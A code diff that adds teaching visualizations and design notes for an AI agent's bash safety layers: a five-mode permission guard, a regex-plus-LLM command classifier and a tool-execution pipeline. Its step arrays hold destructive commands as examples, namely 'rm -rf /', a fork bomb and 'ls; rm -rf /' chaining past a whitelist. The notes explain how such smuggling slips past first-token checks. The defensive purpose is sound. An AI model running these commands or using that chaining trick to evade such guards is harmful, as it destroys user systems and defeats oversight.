diff --git a/web/src/components/ui/badge.tsx b/web/src/components/ui/badge.tsx index e80d61b4b..8bbb317db 100644 --- a/web/src/components/ui/badge.tsx +++ b/web/src/components/ui/badge.tsx @@ -11,6 +11,8 @@ const LAYER_COLORS = { "bg-amber-100 text-amber-800 dark:bg-amber-900/30 dark:text-amber-300", collaboration: "bg-red-100 text-red-800 dark:bg-red-900/30 dark:text-red-300", + security: + "bg-cyan-100 text-cyan-800 dark:bg-cyan-900/30 dark:text-cyan-300", } as const; interface BadgeProps { diff --git a/web/src/components/visualizations/index.tsx b/web/src/components/visualizations/index.tsx index 5fc622223..dc1762359 100644 --- a/web/src/components/visualizations/index.tsx +++ b/web/src/components/visualizations/index.tsx @@ -19,6 +19,9 @@ const visualizations: Record< s10: lazy(() => import("./s10-team-protocols")), s11: lazy(() => import("./s11-autonomous-agents")), s12: lazy(() => import("./s12-worktree-task-isolation")), + s13: lazy(() => import("./s13-permission-guard")), + s14: lazy(() => import("./s14-security-classifier")), + s17: lazy(() => import("./s17-secure-extension-harness")), }; export function SessionVisualization({ version }: { version: string }) { diff --git a/web/src/components/visualizations/s13-permission-guard.tsx b/web/src/components/visualizations/s13-permission-guard.tsx new file mode 100644 index 000000000..cb2d86583 --- /dev/null +++ b/web/src/components/visualizations/s13-permission-guard.tsx @@ -0,0 +1,314 @@ +"use client"; + +import { motion, AnimatePresence } from "framer-motion"; +import { useSteppedVisualization } from "@/hooks/useSteppedVisualization"; +import { StepControls } from "@/components/visualizations/shared/step-controls"; +import { useSvgPalette } from "@/hooks/useDarkMode"; + +const MODES = [ + { name: "allow", label: "Allow", color: "#10b981", darkLabel: "Auto-approve" }, + { name: "deny", label: "Deny", color: "#ef4444", darkLabel: "Block" }, + { name: "ask", label: "Ask", color: "#f59e0b", darkLabel: "User prompt" }, + { name: "auto_edit", label: "Auto Edit", color: "#8b5cf6", darkLabel: "Rewrite" }, + { name: "edit", label: "Edit", color: "#6366f1", darkLabel: "Suggest edit" }, +]; + +const STEP_INFO = [ + { title: "Permission Spectrum", desc: "Five modes replace the binary allow/deny. Each mode handles a different risk level." }, + { title: "Allow: Safe Commands", desc: "ls, cat, git status -- well-known safe commands bypass the prompt and run immediately." }, + { title: "Deny: Dangerous Patterns", desc: "rm -rf /, :(){ :|:& };: -- catastrophic patterns are blocked unconditionally." }, + { title: "Ask: User Confirmation", desc: "pip install, npm publish -- commands that could have side effects get escalated to the user." }, + { title: "Edit: Auto-Rewrite", desc: "rm -rf build/ becomes rm -r build/ -- the force flag is removed without blocking the operation." }, + { title: "Compound Detection", desc: "ls; rm -rf / -- shell metacharacters (; & | `) trigger a block even if the first token is whitelisted." }, +]; + +const COMMANDS_PER_STEP: (string | null)[] = [ + null, + "ls -la", + "rm -rf /", + "pip install requests", + "rm -rf build/", + "ls; rm -rf /", +]; + +const ACTIVE_MODE_PER_STEP: number[] = [-1, 0, 1, 2, 3, 1]; + +const SVG_W = 620; +const SVG_H = 340; +const GUARD_X = SVG_W / 2; +const GUARD_Y = 80; +const GUARD_W = 180; +const GUARD_H = 48; +const CARD_Y = 280; +const CARD_W = 100; +const CARD_H = 52; + +function getModeX(i: number): number { + const gap = 16; + const total = MODES.length * CARD_W + (MODES.length - 1) * gap; + const start = (SVG_W - total) / 2; + return start + i * (CARD_W + gap) + CARD_W / 2; +} + +export default function PermissionGuard({ title }: { title?: string }) { + const { + currentStep, + totalSteps, + next, + prev, + reset, + isPlaying, + toggleAutoPlay, + } = useSteppedVisualization({ totalSteps: STEP_INFO.length, autoPlayInterval: 2500 }); + + const palette = useSvgPalette(); + const activeMode = ACTIVE_MODE_PER_STEP[currentStep]; + const command = COMMANDS_PER_STEP[currentStep]; + const stepInfo = STEP_INFO[currentStep]; + + const rewritten = currentStep === 4 ? "rm -r build/" : null; + const isCompound = currentStep === 5; + + return ( +
+

+ {title || "Permission Guard: Five-Mode Classification"} +

+ +
+ {/* Command input display */} +
+ + Command: + + + {command && ( + + {command} + + )} + {!command && ( + + waiting for command... + + )} + + {rewritten && ( + + → {rewritten} + + )} +
+ + {/* SVG diagram */} + + + + + + {MODES.map((m) => ( + + + + ))} + + + + + + + + + {/* PermissionGuard classifier box */} + 0 ? palette.activeNodeFill : palette.nodeFill, + stroke: currentStep > 0 ? palette.activeNodeStroke : palette.nodeStroke, + }} + filter={currentStep > 0 ? "url(#guard-glow)" : "none"} + transition={{ duration: 0.4 }} + /> + 0 ? palette.activeNodeText : palette.nodeText }} + transition={{ duration: 0.4 }} + > + classify(cmd) + + + {/* Compound detection warning */} + {isCompound && ( + + + + metachar: ; + + + compound detected + + + )} + + {/* Connection lines */} + {MODES.map((m, i) => { + const modeX = getModeX(i); + const isActive = i === activeMode; + return ( + + ); + })} + + {/* Mode cards */} + {MODES.map((m, i) => { + const modeX = getModeX(i); + const isActive = i === activeMode; + return ( + + + + {m.label} + + + {m.darkLabel} + + + ); + })} + + + {/* Code snippet */} +
+ + def{" "} + classify(cmd): + {"\n "} + {"# "} + {currentStep === 5 + ? "if has_metacharacters(cmd): → deny" + : currentStep === 4 + ? "if matches(edit_rules): → edit (rewrite)" + : currentStep === 2 + ? "if matches(denied): → deny" + : currentStep === 1 + ? "if in whitelist: → allow" + : "return mode, reason"} + +
+
+ + +
+ ); +} diff --git a/web/src/components/visualizations/s14-security-classifier.tsx b/web/src/components/visualizations/s14-security-classifier.tsx new file mode 100644 index 000000000..fa253832b --- /dev/null +++ b/web/src/components/visualizations/s14-security-classifier.tsx @@ -0,0 +1,413 @@ +"use client"; + +import { motion, AnimatePresence } from "framer-motion"; +import { useSteppedVisualization } from "@/hooks/useSteppedVisualization"; +import { StepControls } from "@/components/visualizations/shared/step-controls"; +import { useSvgPalette } from "@/hooks/useDarkMode"; + +const STEP_INFO = [ + { title: "Two-Layer Pipeline", desc: "Layer 1 (regex) catches known patterns at zero cost. Layer 2 (LLM) handles the rest." }, + { title: "Layer 1: Regex Hit", desc: "rm -rf / matches a dangerous pattern. Blocked immediately with zero API cost." }, + { title: "Layer 1: Whitelist", desc: "ls is on the safe list. Auto-approved without reaching Layer 2." }, + { title: "Layer 1: Miss → Escalate", desc: "curl example.com doesn't match any pattern. Escalated to Layer 2 for semantic analysis." }, + { title: "Layer 2: LLM Classify", desc: "The LLM analyzes intent and returns a level (safe/moderate/dangerous) with a source tag." }, + { title: "Fallback: Moderate Default", desc: "When the LLM fails (timeout, API error), it defaults to moderate → ask mode. Safe by default." }, +]; + +const COMMANDS: (string | null)[] = [ + null, + "rm -rf /", + "ls -la", + "curl example.com", + "curl example.com", + "some-command", +]; + +const SOURCES: (string | null)[] = [ + null, "pattern", "whitelist", null, "llm", "fallback", +]; + +const RESULTS: (string | null)[] = [ + null, "dangerous → deny", "safe → allow", null, "moderate → ask", "moderate → ask", +]; + +const SVG_W = 620; +const SVG_H = 380; +const INPUT_X = 100; +const INPUT_Y = 60; +const L1_X = 310; +const L1_Y = 140; +const L2_X = 310; +const L2_Y = 270; +const RESULT_X = 520; +const RESULT_Y = 200; +const BOX_W = 160; +const BOX_H = 48; + +export default function SecurityClassifier({ title }: { title?: string }) { + const { + currentStep, + totalSteps, + next, + prev, + reset, + isPlaying, + toggleAutoPlay, + } = useSteppedVisualization({ totalSteps: STEP_INFO.length, autoPlayInterval: 2500 }); + + const palette = useSvgPalette(); + const command = COMMANDS[currentStep]; + const source = SOURCES[currentStep]; + const result = RESULTS[currentStep]; + const stepInfo = STEP_INFO[currentStep]; + + // Layer activity + const l1Active = currentStep >= 1 && currentStep <= 3; + const l2Active = currentStep === 4 || currentStep === 5; + const resultActive = currentStep >= 1; + + // L1 outcome + const l1Hit = currentStep === 1 || currentStep === 2; + const l1Miss = currentStep === 3; + + return ( +
+

+ {title || "Security Classifier: Regex + LLM Pipeline"} +

+ +
+ {/* Command input */} +
+ + Input: + + + {command && ( + + {command} + + )} + {!command && ( + + command enters pipeline... + + )} + + {source && ( + + source: {source} + + )} +
+ + {/* SVG pipeline diagram */} + + + + + + + + + + + + + + + + + + + + {/* Input node */} + 0 ? palette.activeNodeFill : palette.nodeFill, + stroke: currentStep > 0 ? palette.activeNodeStroke : palette.nodeStroke, + }} + filter={currentStep > 0 ? "url(#sc-glow-blue)" : "none"} + transition={{ duration: 0.4 }} + /> + 0 ? palette.activeNodeText : palette.nodeText }} + transition={{ duration: 0.4 }} + > + command + + + {/* Input → L1 line */} + + + {/* Layer 1: Regex */} + + + Layer 1: Regex + + + zero cost · pattern match + + + {/* L1 hit label */} + {l1Hit && ( + + + + {currentStep === 1 ? "PATTERN HIT" : "WHITELIST"} + + + )} + + {/* L1 → Result (when hit) */} + + + {/* L1 → L2 line */} + + + {/* "miss" label on L1→L2 */} + {l1Miss && ( + + + + ESCALATE + + + )} + + {/* Layer 2: LLM */} + + + Layer 2: LLM + + + ~10 tokens · intent analysis + + + {/* L2 → Result line */} + + + {/* Result node */} + + + result + + + {/* Result annotation */} + {result && ( + + {result} + + )} + + {/* Cost labels */} + + Cost: 0 tokens + + + Cost: ~10 tokens + + + + {/* Code snippet */} +
+ + def{" "} + classify(cmd): + {"\n "} + {"# "} + {currentStep === 1 + ? "quick_scan(cmd) → dangerous (pattern match)" + : currentStep === 2 + ? "quick_scan(cmd) → safe (whitelist)" + : currentStep === 3 + ? "quick_scan(cmd) → None → escalate to LLM" + : currentStep === 4 + ? "llm_classify(cmd) → {level, source: 'llm'}" + : currentStep === 5 + ? "llm_classify failed → fallback moderate (ask)" + : "result = quick_scan(cmd) or llm_classify(cmd)"} + +
+
+ + +
+ ); +} diff --git a/web/src/components/visualizations/s17-secure-extension-harness.tsx b/web/src/components/visualizations/s17-secure-extension-harness.tsx new file mode 100644 index 000000000..4dbd2ae74 --- /dev/null +++ b/web/src/components/visualizations/s17-secure-extension-harness.tsx @@ -0,0 +1,381 @@ +"use client"; + +import { motion, AnimatePresence } from "framer-motion"; +import { useSteppedVisualization } from "@/hooks/useSteppedVisualization"; +import { StepControls } from "@/components/visualizations/shared/step-controls"; +import { useSvgPalette } from "@/hooks/useDarkMode"; + +const LAYERS = [ + { id: "prehook", label: "PreHook", color: "#06b6d4", desc: "Intercept before execution" }, + { id: "classify", label: "Classify", color: "#f59e0b", desc: "Security classification" }, + { id: "permission", label: "Permission", color: "#8b5cf6", desc: "Mode-based decision" }, + { id: "execute", label: "Execute", color: "#10b981", desc: "Run handler or MCP" }, + { id: "posthook", label: "PostHook", color: "#3b82f6", desc: "Post-execution hooks" }, +]; + +const STEP_INFO = [ + { title: "The Execution Pipeline", desc: "Five layers compose into a single chokepoint. Every tool call flows through all layers." }, + { title: "Layer 1: PreHook", desc: "Registered hooks fire before execution. They can observe, modify input, or block entirely." }, + { title: "Layer 2: Classify", desc: "For bash commands, the two-layer classifier (regex + LLM) determines intent." }, + { title: "Layer 3: Permission", desc: "The classification result maps to a permission mode (allow/deny/ask/edit)." }, + { title: "Layer 4: Execute", desc: "If permitted, the tool handler or MCP server runs and produces a result." }, + { title: "Layer 5: PostHook", desc: "Post-execution hooks fire: audit logging, notifications, cleanup." }, + { title: "Blocked at Layer 2", desc: "rm -rf / is classified as dangerous → permission denies → execution never starts." }, +]; + +const COMMANDS: (string | null)[] = [ + null, "ls -la", "ls -la", "ls -la", "ls -la", "ls -la", "rm -rf /", +]; + +const OUTCOMES: (string | null)[] = [ + null, null, "safe", "allow", "✓ result", "audit logged", "✗ BLOCKED", +]; + +const SVG_W = 600; +const SVG_H = 400; +const PIPE_X = 200; +const PIPE_START_Y = 50; +const LAYER_H = 48; +const LAYER_W = 180; +const LAYER_GAP = 14; +const BLOCKED_X = 450; +const RESULT_X = 450; + +function getLayerY(i: number): number { + return PIPE_START_Y + i * (LAYER_H + LAYER_GAP); +} + +export default function SecureExtensionHarness({ title }: { title?: string }) { + const { + currentStep, + totalSteps, + next, + prev, + reset, + isPlaying, + toggleAutoPlay, + } = useSteppedVisualization({ totalSteps: STEP_INFO.length, autoPlayInterval: 2500 }); + + const palette = useSvgPalette(); + const command = COMMANDS[currentStep]; + const outcome = OUTCOMES[currentStep]; + const stepInfo = STEP_INFO[currentStep]; + const isBlocked = currentStep === 6; + + // Which layers are active/passed + const activeLayer = isBlocked ? 1 : currentStep > 0 ? currentStep - 1 : -1; + const passedLayers = isBlocked ? 1 : currentStep > 0 ? currentStep : 0; + + return ( +
+

+ {title || "Secure Extension Harness: 5-Layer Pipeline"} +

+ +
+ {/* Command input */} +
+ + Tool call: + + + {command && ( + + bash({command}) + + )} + {!command && ( + + execute_tool() waiting... + + )} + + {outcome && ( + + {outcome} + + )} +
+ + {/* SVG pipeline */} + + + {LAYERS.map((l) => ( + + + + ))} + + + + + + + + + + + + {/* Vertical connection lines between layers */} + {LAYERS.map((_, i) => { + if (i >= LAYERS.length - 1) return null; + const y1 = getLayerY(i) + LAYER_H / 2; + const y2 = getLayerY(i + 1) - LAYER_H / 2; + const isPassed = isBlocked ? i < 1 : (i < passedLayers && currentStep > 0); + return ( + + ); + })} + + {/* Layer boxes */} + {LAYERS.map((layer, i) => { + const y = getLayerY(i); + const isPassedThrough = isBlocked ? i === 0 : (i < passedLayers && currentStep > 0); + const isBlockedHere = isBlocked && i === 1; + const isActive = !isBlocked && i === activeLayer; + + return ( + + + + {isBlockedHere ? "✗ BLOCKED" : layer.label} + + + {isBlockedHere ? "dangerous → deny" : layer.desc} + + + ); + })} + + {/* Result node (right of Execute layer) */} + + {currentStep >= 5 && !isBlocked && ( + + + + + RESULT + + + )} + + + {/* Blocked indicator (right of Classify layer) */} + + {isBlocked && ( + + + + + DENIED + + + )} + + + {/* Layer number indicators */} + {LAYERS.map((_, i) => { + const y = getLayerY(i); + return ( + + L{i + 1} + + ); + })} + + + {/* Code snippet */} +
+ + def{" "} + execute_tool(name, input): + {"\n "} + {"# "} + {isBlocked + ? "classify → dangerous → return denied" + : activeLayer === 0 + ? "hooks.fire('PreToolUse', name, input)" + : activeLayer === 1 + ? "level = classifier.classify(input.cmd)" + : activeLayer === 2 + ? "mode = guard.check(level)" + : activeLayer === 3 + ? "result = handler(input) or mcp.call(name)" + : activeLayer === 4 + ? "hooks.fire('PostToolUse', name, result)" + : "PreHook → Classify → Permission → Execute → PostHook"} + +
+
+ + +
+ ); +} diff --git a/web/src/data/annotations/s13.json b/web/src/data/annotations/s13.json new file mode 100644 index 000000000..51d375fc3 --- /dev/null +++ b/web/src/data/annotations/s13.json @@ -0,0 +1,47 @@ +{ + "version": "s13", + "decisions": [ + { + "id": "spectrum-not-binary", + "title": "Permission as a Spectrum, Not a Switch", + "description": "Most security systems treat commands as allowed or denied. s13 introduces five modes: allow, ask, deny, auto_edit, and edit. This spectrum lets the harness auto-approve safe commands (ls, cat) while blocking catastrophes (rm -rf /) and escalating uncertain cases to the user. The edit mode is particularly useful: it rewrites rm -rf to rm -r, removing the force flag without blocking the operation entirely.", + "alternatives": "A simple allow/deny list is easier to implement but forces a binary choice on every command. The user either approves everything or nothing. The five-mode spectrum gives the harness nuance: it can handle 90% of commands automatically and only escalate the genuinely ambiguous ones.", + "zh": { + "title": "权限是光谱,不是开关", + "description": "大多数安全系统将命令视为允许或拒绝。s13 引入五种模式:allow、ask、deny、auto_edit 和 edit。这个光谱让 Harness 自动批准安全命令(ls、cat),同时阻止灾难性操作(rm -rf /),将不确定的情况上报给用户。edit 模式特别有用:它将 rm -rf 改写为 rm -r,去掉了强制标志但不完全阻止操作。" + }, + "ja": { + "title": "権限はスイッチではなくスペクトラム", + "description": "ほとんどのセキュリティシステムはコマンドを許可または拒否として扱う。s13は5つのモードを導入する:allow、ask、deny、auto_edit、edit。このスペクトラムにより、安全なコマンド(ls、cat)は自動承認し、破壊的操作(rm -rf /)はブロックし、不確実なケースはユーザーに確認できる。" + } + }, + { + "id": "compound-command-detection", + "title": "Detecting Compound Commands", + "description": "The whitelist check only looks at the first token of a command. Without compound detection, ls; rm -rf / would pass because ls is whitelisted. s13 adds a regex check for shell metacharacters (;, &, |, `, $()) before whitelist approval. This prevents an attacker (or confused model) from smuggling dangerous commands behind a safe prefix.", + "alternatives": "A full shell parser (like tree-sitter-bash) would be more accurate but adds a heavy dependency. The regex approach catches 99% of compound commands in practice, and the LLM classifier (s14) handles the remaining edge cases.", + "zh": { + "title": "复合命令检测", + "description": "白名单检查只看命令的第一个 token。没有复合检测的话,ls; rm -rf / 会通过,因为 ls 在白名单中。s13 在白名单批准前添加了 shell 元字符(;、&、|、`、$())的正则检查,防止危险命令藏在安全前缀后面。" + }, + "ja": { + "title": "複合コマンドの検出", + "description": "ホワイトリストチェックはコマンドの最初のトークンのみを見る。複合検出がなければ、ls; rm -rf / が ls はホワイトリストにあるため通過してしまう。s13はホワイトリスト承認前にシェルメタ文字(;、&、|、`、$())の正規チェックを追加し、安全なプレフィックスの背後に危険なコマンドが隠れるのを防ぐ。" + } + }, + { + "id": "deny-first-priority", + "title": "Deny Rules Run First", + "description": "The classify() method checks deny patterns before the whitelist. This means even if a command starts with a whitelisted tool, if it contains a denied pattern anywhere, it gets blocked. This 'safety first' ordering ensures that dangerous patterns can never be bypassed by a whitelist match.", + "alternatives": "Checking whitelist first would be faster for the common case (most commands are safe) but could miss dangerous suffixes. The deny-first ordering trades a small performance cost for guaranteed safety.", + "zh": { + "title": "拒绝规则优先执行", + "description": "classify() 方法在白名单之前检查拒绝模式。这意味着即使命令以白名单工具开头,只要包含拒绝模式就会被阻止。这种'安全优先'的顺序确保危险模式永远不会被白名单绕过。" + }, + "ja": { + "title": "拒否ルールを最初に実行", + "description": "classify()メソッドはホワイトリストの前に拒否パターンをチェックする。つまり、コマンドがホワイトリストツールで始まっていても、拒否パターンが含まれていればブロックされる。この「安全第一」の順序により、危険なパターンがホワイトリスト一致でバイパスされることはない。" + } + } + ] +} diff --git a/web/src/data/annotations/s14.json b/web/src/data/annotations/s14.json new file mode 100644 index 000000000..918793061 --- /dev/null +++ b/web/src/data/annotations/s14.json @@ -0,0 +1,47 @@ +{ + "version": "s14", + "decisions": [ + { + "id": "two-layer-classification", + "title": "Two Layers: Regex + LLM", + "description": "Regex patterns are fast (zero cost) but can only match shapes, not intent. LLM classification understands intent but costs ~10 tokens per call. The two-layer pipeline gets the best of both: Layer 1 (regex) instantly blocks known dangerous patterns at zero cost, and only unknown commands reach Layer 2 (LLM) for semantic analysis.", + "alternatives": "Using only regex would miss novel attack vectors. Using only LLM would be too slow and expensive for every command. The two-layer approach amortizes cost: most commands are resolved by Layer 1, and the LLM only fires for ambiguous cases.", + "zh": { + "title": "两层分类:正则 + LLM", + "description": "正则模式速度快(零成本)但只能匹配形状,不理解意图。LLM 分类理解意图但每次调用花费约 10 tokens。两层管线兼得两者优势:Layer 1(正则)以零成本即时拦截已知危险模式,只有未知命令才到达 Layer 2(LLM)进行语义分析。" + }, + "ja": { + "title": "2層分類:正規表現 + LLM", + "description": "正規パターンは高速(ゼロコスト)だが形状しかマッチできず、意図を理解できない。LLM分類は意図を理解するが呼び出しごとに約10トークンかかる。2層パイプラインは両方の利点を得る:Layer 1(正規表現)が既知の危険パターンをゼロコストで即座にブロックし、未知のコマンドのみがLayer 2(LLM)に到達する。" + } + }, + { + "id": "moderate-as-default", + "title": "Moderate as the Safe Default", + "description": "When the LLM classifier fails (API error, timeout, unparseable response), it defaults to 'moderate', which maps to 'ask' mode. This means the user gets prompted instead of the command being auto-approved or silently denied. It's the safest fallback: it doesn't block legitimate work, but it doesn't let dangerous commands through either.", + "alternatives": "Defaulting to 'allow' would be dangerous -- a classifier failure could let catastrophic commands through. Defaulting to 'deny' would be too aggressive, blocking legitimate work when the API is flaky. 'Moderate/ask' is the Goldilocks zone.", + "zh": { + "title": "Moderate 作为安全默认值", + "description": "当 LLM 分类器失败(API 错误、超时、无法解析的响应)时,默认返回 'moderate',对应 'ask' 模式。用户被提示确认,而不是命令被自动批准或静默拒绝。这是最安全的回退:不阻塞合法工作,也不让危险命令通过。" + }, + "ja": { + "title": "Moderateを安全なデフォルトに", + "description": "LLM分類器が失敗した場合(APIエラー、タイムアウト、解析不能なレスポンス)、デフォルトで'moderate'を返し、'ask'モードにマップされる。ユーザーに確認が求められ、コマンドが自動承認または黙って拒否されることはない。" + } + }, + { + "id": "classifier-source-tracking", + "title": "Source Tracking in Classification Results", + "description": "Each classification result includes a 'source' field: 'pattern', 'whitelist', or 'llm'. This lets the user and developers understand why a command was approved or denied. It's also valuable for debugging: if a command is incorrectly classified, the source field tells you which layer made the mistake.", + "alternatives": "Without source tracking, debugging misclassifications requires reading logs and guessing which layer produced the result. The source field adds one field to the response but saves hours of debugging time.", + "zh": { + "title": "分类结果的来源追踪", + "description": "每个分类结果包含一个 'source' 字段:'pattern'、'whitelist' 或 'llm'。这让用户和开发者理解为什么命令被批准或拒绝。它对调试也很有价值:如果命令被错误分类,source 字段告诉你哪一层犯了错误。" + }, + "ja": { + "title": "分類結果のソース追跡", + "description": "各分類結果には'source'フィールドが含まれる:'pattern'、'whitelist'、または'llm'。これによりユーザーと開発者はコマンドが承認または拒否された理由を理解できる。デバッグにも価値がある:コマンドが誤って分類された場合、sourceフィールドがどの層で間違いが起きたかを教える。" + } + } + ] +} diff --git a/web/src/data/annotations/s17.json b/web/src/data/annotations/s17.json new file mode 100644 index 000000000..7746a086a --- /dev/null +++ b/web/src/data/annotations/s17.json @@ -0,0 +1,47 @@ +{ + "version": "s17", + "decisions": [ + { + "id": "pipeline-over-monolith", + "title": "Pipeline Over Monolith", + "description": "s17 composes four independent systems (hooks, classifier, permission, MCP) into a single execution pipeline. Each layer answers exactly one question and knows nothing about the others. This separation of concerns means you can add, remove, or reorder layers without touching the others. It's the Unix philosophy applied to agent security: do one thing well.", + "alternatives": "A monolithic security function that combines all checks in one place would be simpler to write but harder to maintain. When you need to change how one layer works, you'd have to understand the entire function. The pipeline approach lets you modify one layer independently.", + "zh": { + "title": "管线优于单体", + "description": "s17 将四个独立系统(hooks、分类器、权限、MCP)组合为一条执行管线。每层只回答一个问题,对其他层一无所知。这种关注点分离意味着你可以添加、移除或重排层而不影响其他层。这是 Unix 哲学在 Agent 安全中的应用:做好一件事。" + }, + "ja": { + "title": "モノリスよりパイプライン", + "description": "s17は4つの独立したシステム(フック、分類器、権限、MCP)を単一の実行パイプラインに構成する。各層は1つの質問にのみ答え、他の層について何も知らない。この関心の分離により、他の層に触れることなく層の追加、削除、並べ替えが可能になる。" + } + }, + { + "id": "execute-tool-single-entry", + "title": "Single Entry Point for All Tools", + "description": "Every tool call goes through execute_tool(), which runs the full 5-layer pipeline. There's no way to bypass the pipeline by calling a handler directly -- the agent loop only calls execute_tool(). This 'chokepoint' design ensures that no tool execution can skip security checks, even as new tools are added.", + "alternatives": "Letting each tool handler call security checks independently would create gaps: a new handler might forget to add the check. A single entry point enforces security by construction.", + "zh": { + "title": "所有工具的单一入口点", + "description": "每个工具调用都通过 execute_tool(),运行完整的 5 层管线。无法通过直接调用 handler 绕过管线 -- agent 循环只调用 execute_tool()。这种'咽喉点'设计确保没有工具执行能跳过安全检查,即使添加了新工具。" + }, + "ja": { + "title": "全ツールの単一エントリポイント", + "description": "すべてのツール呼び出しはexecute_tool()を経由し、完全な5層パイプラインを実行する。ハンドラーを直接呼び出してパイプラインをバイパスする方法はない。この「チョークポイント」設計により、新しいツールが追加されてもセキュリティチェックをスキップできない。" + } + }, + { + "id": "bash-only-classification", + "title": "Classification Only for Bash", + "description": "The classifier and permission guard only apply to bash commands, not to read_file, write_file, or edit_file. File tools already have path sandboxing (safe_path), and their scope is inherently limited. Bash is the Swiss Army knife -- it can do anything, including destroying your system -- so it needs the extra scrutiny.", + "alternatives": "Classifying every tool call would be more thorough but wasteful. read_file can't delete files, write_file can only write within the workspace, and edit_file does surgical replacements. Only bash has the power to execute arbitrary commands.", + "zh": { + "title": "仅对 Bash 命令分类", + "description": "分类器和权限守卫仅适用于 bash 命令,不适用于 read_file、write_file 或 edit_file。文件工具已有路径沙箱(safe_path),其范围本身有限。Bash 是万能工具 -- 它可以做任何事,包括破坏系统 -- 所以需要额外的审查。" + }, + "ja": { + "title": "Bashのみ分類", + "description": "分類器と権限ガードはbashコマンドにのみ適用され、read_file、write_file、edit_fileには適用されない。ファイルツールには既にパスサンドボックス(safe_path)があり、bashのみが任意のコマンドを実行できる力を持つため、追加の審査が必要。" + } + } + ] +} diff --git a/web/src/data/execution-flows.ts b/web/src/data/execution-flows.ts index 72ce54dd0..86053bf13 100644 --- a/web/src/data/execution-flows.ts +++ b/web/src/data/execution-flows.ts @@ -274,17 +274,17 @@ export const EXECUTION_FLOWS: Record = { s12: { nodes: [ { id: "start", label: "User Input", type: "start", x: COL_CENTER, y: 30 }, - { id: "llm", label: "LLM Call", type: "process", x: COL_CENTER, y: 110 }, - { id: "tool_check", label: "tool_use?", type: "decision", x: COL_CENTER, y: 190 }, - { id: "is_wt", label: "worktree tool?", type: "decision", x: COL_LEFT, y: 280 }, - { id: "task", label: "Task Board\\n(.tasks)", type: "process", x: 60, y: 360 }, - { id: "wt_create", label: "Allocate / Enter\\nWorktree", type: "subprocess", x: 60, y: 440 }, - { id: "wt_run", label: "Run in\\nIsolated Dir", type: "subprocess", x: COL_LEFT + 80, y: 360 }, - { id: "wt_close", label: "Closeout:\\nworktree_keep / remove", type: "process", x: COL_LEFT + 80, y: 440 }, - { id: "events", label: "Emit Lifecycle Events\\n(side-channel)", type: "process", x: COL_RIGHT, y: 420 }, - { id: "events_read", label: "Optional Read\\nworktree_events", type: "subprocess", x: COL_RIGHT, y: 520 }, - { id: "append", label: "Append Result", type: "process", x: COL_CENTER, y: 530 }, - { id: "end", label: "Output", type: "end", x: COL_RIGHT, y: 280 }, + { id: "llm", label: "LLM Call", type: "process", x: COL_CENTER, y: 100 }, + { id: "tool_check", label: "tool_use?", type: "decision", x: COL_CENTER, y: 175 }, + { id: "is_wt", label: "worktree tool?", type: "decision", x: 180, y: 265 }, + { id: "end", label: "Output", type: "end", x: 460, y: 175 }, + { id: "task", label: "Task Board\n(.tasks)", type: "process", x: 30, y: 365 }, + { id: "wt_create", label: "Create/Bind\nWorktree", type: "subprocess", x: 180, y: 365 }, + { id: "wt_run", label: "Run in\nIsolated Dir", type: "subprocess", x: 340, y: 365 }, + { id: "wt_close", label: "Closeout", type: "process", x: 340, y: 460 }, + { id: "events", label: "Lifecycle Events\n(side-channel)", type: "process", x: 460, y: 265 }, + { id: "events_read", label: "Read Events", type: "subprocess", x: 460, y: 450 }, + { id: "append", label: "Append Result", type: "process", x: COL_CENTER, y: 560 }, ], edges: [ { from: "start", to: "llm" }, @@ -296,15 +296,88 @@ export const EXECUTION_FLOWS: Record = { { from: "is_wt", to: "wt_run", label: "run/status" }, { from: "task", to: "wt_create", label: "allocate lane" }, { from: "wt_create", to: "wt_run" }, - { from: "task", to: "append", label: "task result" }, - { from: "wt_create", to: "events", label: "emit create" }, - { from: "wt_create", to: "append", label: "create result" }, { from: "wt_run", to: "wt_close" }, - { from: "wt_run", to: "append", label: "run/status result" }, - { from: "wt_close", to: "events", label: "emit closeout" }, - { from: "wt_close", to: "append", label: "closeout result" }, - { from: "events", to: "events_read", label: "optional query" }, - { from: "events_read", to: "append", label: "events result" }, + { from: "is_wt", to: "events", label: "lifecycle" }, + { from: "events", to: "events_read" }, + { from: "wt_close", to: "append" }, + { from: "events_read", to: "append" }, + { from: "append", to: "llm" }, + ], + }, + s13: { + nodes: [ + { id: "start", label: "User Input", type: "start", x: COL_CENTER, y: 30 }, + { id: "llm", label: "LLM Call", type: "process", x: COL_CENTER, y: 110 }, + { id: "tool_check", label: "tool_use?", type: "decision", x: COL_CENTER, y: 190 }, + { id: "is_bash", label: "bash?", type: "decision", x: COL_LEFT, y: 280 }, + { id: "guard", label: "PermissionGuard\nclassify()", type: "decision", x: 60, y: 380 }, + { id: "exec", label: "Execute Tool", type: "subprocess", x: COL_LEFT + 100, y: 380 }, + { id: "append", label: "Append Result", type: "process", x: COL_CENTER, y: 520 }, + { id: "end", label: "Output", type: "end", x: COL_RIGHT, y: 280 }, + ], + edges: [ + { from: "start", to: "llm" }, + { from: "llm", to: "tool_check" }, + { from: "tool_check", to: "is_bash", label: "yes" }, + { from: "tool_check", to: "end", label: "no" }, + { from: "is_bash", to: "guard", label: "yes" }, + { from: "is_bash", to: "exec", label: "no" }, + { from: "guard", to: "exec", label: "allow" }, + { from: "guard", to: "append", label: "deny" }, + { from: "exec", to: "append" }, + { from: "append", to: "llm" }, + ], + }, + s14: { + nodes: [ + { id: "start", label: "User Input", type: "start", x: COL_CENTER, y: 30 }, + { id: "llm", label: "LLM Call", type: "process", x: COL_CENTER, y: 110 }, + { id: "tool_check", label: "tool_use?", type: "decision", x: COL_CENTER, y: 190 }, + { id: "is_bash", label: "bash?", type: "decision", x: COL_LEFT, y: 280 }, + { id: "quick", label: "Layer 1\nRegex Quick-Scan", type: "process", x: 100, y: 380 }, + { id: "llm_cls", label: "Layer 2\nLLM Classify", type: "subprocess", x: 60, y: 490 }, + { id: "exec", label: "Execute Tool", type: "subprocess", x: COL_LEFT + 120, y: 380 }, + { id: "append", label: "Append Result", type: "process", x: COL_CENTER, y: 600 }, + { id: "end", label: "Output", type: "end", x: COL_RIGHT, y: 280 }, + ], + edges: [ + { from: "start", to: "llm" }, + { from: "llm", to: "tool_check" }, + { from: "tool_check", to: "is_bash", label: "yes" }, + { from: "tool_check", to: "end", label: "no" }, + { from: "is_bash", to: "quick", label: "yes" }, + { from: "is_bash", to: "exec", label: "no" }, + { from: "quick", to: "append", label: "deny" }, + { from: "quick", to: "llm_cls", label: "no match" }, + { from: "llm_cls", to: "exec", label: "safe" }, + { from: "llm_cls", to: "append", label: "deny" }, + { from: "exec", to: "append" }, + { from: "append", to: "llm" 